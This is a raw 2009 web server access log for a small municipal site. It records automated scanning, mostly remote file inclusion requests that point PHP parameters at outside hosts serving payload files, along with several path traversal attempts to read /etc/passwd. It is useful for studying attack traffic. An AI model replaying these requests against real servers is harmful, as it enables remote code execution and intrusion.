124.32.56.166 - - [01/Jul/2009:07:57:05 -0700] "GET //modules/My_eGallery/index.php?basepath=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.76.47.207 - - [01/Jul/2009:08:04:19 -0700] "GET /index2.php?menu=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
38.99.44.103 - - [01/Jul/2009:08:17:29 -0700] "GET /logs/access_090101.log HTTP/1.0" 200 774440 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "cityofarkadelphia.com"
201.76.47.207 - - [01/Jul/2009:08:21:50 -0700] "GET /logs/access.log/index2.php?menu=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.76.47.207 - - [01/Jul/2009:08:21:50 -0700] "GET /index2.php?menu=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.76.47.207 - - [01/Jul/2009:08:21:50 -0700] "GET /logs/index2.php?menu=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:08:26:01 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:08:26:02 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.22.227.138 - - [01/Jul/2009:08:29:45 -0700] "GET /logs/access_080601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.119.154.129 - - [01/Jul/2009:08:37:45 -0700] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.119.154.129 - - [01/Jul/2009:08:37:45 -0700] "GET /logs/access.log/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.119.154.129 - - [01/Jul/2009:08:37:45 -0700] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:08:38:51 -0700] "GET /logs/access.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:08:38:52 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:08:38:52 -0700] "GET /logs/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
65.60.39.194 - - [01/Jul/2009:08:39:53 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sarangttl.net/bbs/idx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:40:36 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:43:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.60.39.194 - - [01/Jul/2009:08:43:13 -0700] "GET /logs/access_080531.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sarangttl.net/bbs/idx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "cityofarkadelphia.com"
65.60.39.194 - - [01/Jul/2009:08:43:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sarangttl.net/bbs/idx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "cityofarkadelphia.com"
65.60.39.194 - - [01/Jul/2009:08:43:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sarangttl.net/bbs/idx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:08:43:52 -0700] "GET /logs/access_080330.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:45:40 -0700] "GET /logs/access_080531.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:45:40 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:45:40 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:47:38 -0700] "GET /logs/access_080531.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:47:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:47:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:08:47:47 -0700] "GET /logs/access.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:08:47:48 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:08:47:49 -0700] "GET /logs/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:08:48:32 -0700] "GET /logs/access.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:08:48:33 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:08:48:33 -0700] "GET /logs/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
91.192.20.164 - - [01/Jul/2009:08:52:20 -0700] "GET /logs/access_080330.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
205.178.184.153 - - [01/Jul/2009:08:56:07 -0700] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "cityofarkadelphia.com"
205.178.184.153 - - [01/Jul/2009:08:56:08 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:08:57:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://haruuu.com/id.txt??????????? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
205.178.184.153 - - [01/Jul/2009:08:58:04 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "cityofarkadelphia.com"
205.178.184.153 - - [01/Jul/2009:08:58:04 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:01:58 -0700] "GET /logs/access_080330.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:09:02:19 -0700] "GET /logs/access_080330.log/error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:03:38 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.123.139 - - [01/Jul/2009:09:06:12 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:09:07:42 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:24:30 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:24:31 -0700] "GET /include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:24:31 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:27:59 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:27:59 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:09:28:00 -0700] "GET /include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
76.163.252.93 - - [01/Jul/2009:09:29:12 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
76.163.252.93 - - [01/Jul/2009:09:29:12 -0700] "GET /logs/access.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
76.163.252.93 - - [01/Jul/2009:09:29:12 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
76.163.252.93 - - [01/Jul/2009:09:32:00 -0700] "GET /logs/access.log%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:09:35:18 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:09:35:18 -0700] "GET /logs/access.log%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
110.45.138.139 - - [01/Jul/2009:09:35:18 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:36:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:36:52 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:36:52 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:36:52 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
38.99.44.103 - - [01/Jul/2009:09:40:28 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:09:41:18 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:09:41:18 -0700] "GET /logs/access_080531.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:09:41:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:44:53 -0700] "GET /logs/access.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:44:53 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:44:54 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
87.106.54.126 - - [01/Jul/2009:09:46:20 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.54.126 - - [01/Jul/2009:09:46:20 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:46:27 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.144.44.36 - - [01/Jul/2009:09:46:27 -0700] "GET /logs/access_080330.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.54.126 - - [01/Jul/2009:09:47:03 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:09:47:51 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:09:47:54 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:09:47:54 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.110.97.12 - - [01/Jul/2009:09:48:54 -0700] "GET /logs/access.log%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:09:49:49 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:09:49:50 -0700] "GET /logs/access_080531.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:09:49:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.54.126 - - [01/Jul/2009:09:50:55 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:09:52:26 -0700] "GET /logs/access_080531.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.38.0.130 - - [01/Jul/2009:09:55:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.38.0.130 - - [01/Jul/2009:09:55:01 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.38.0.130 - - [01/Jul/2009:09:55:01 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:09:56:38 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:09:57:14 -0700] "GET /?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:09:57:14 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:09:57:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:09:57:33 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:09:59:41 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.17.129.100 - - [01/Jul/2009:10:00:01 -0700] "GET /logs/access_080531.log%20%20//?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.38.0.130 - - [01/Jul/2009:10:02:24 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.118.116.72 - - [01/Jul/2009:10:09:39 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.118.116.72 - - [01/Jul/2009:10:09:39 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.118.116.72 - - [01/Jul/2009:10:09:39 -0700] "GET /include/mail.inc.php?skin_board_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.26.40 - - [01/Jul/2009:10:09:56 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
87.118.116.72 - - [01/Jul/2009:10:11:58 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.93.162.116 - - [01/Jul/2009:10:14:45 -0700] "GET /logs/access_081231.log HTTP/1.0" 200 340114 "http://cityofarkadelphia.com/logs/access_081231.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:10:17:21 -0700] "GET /logs/access.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:10:17:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:10:17:24 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:10:21:39 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:10:21:39 -0700] "GET /logs/access.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:10:21:39 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:10:25:43 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:10:25:44 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:10:25:44 -0700] "GET /logs/access_080531.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:28:59 -0700] "GET /page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:29:00 -0700] "GET /logs/page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:29:01 -0700] "GET /logs/access_080330.log%20%20/page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:33:15 -0700] "GET /page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:33:15 -0700] "GET /logs/page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:33:15 -0700] "GET /logs/access_080330.log%20%20/page.php5?id=http://anthony-campbell.com/public/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.63.185.58 - - [01/Jul/2009:10:34:12 -0700] "GET /logs/?p=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 200 4227 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.63.185.58 - - [01/Jul/2009:10:34:12 -0700] "GET /logs/access.log/?p=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.63.185.58 - - [01/Jul/2009:10:34:17 -0700] "GET /?p=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
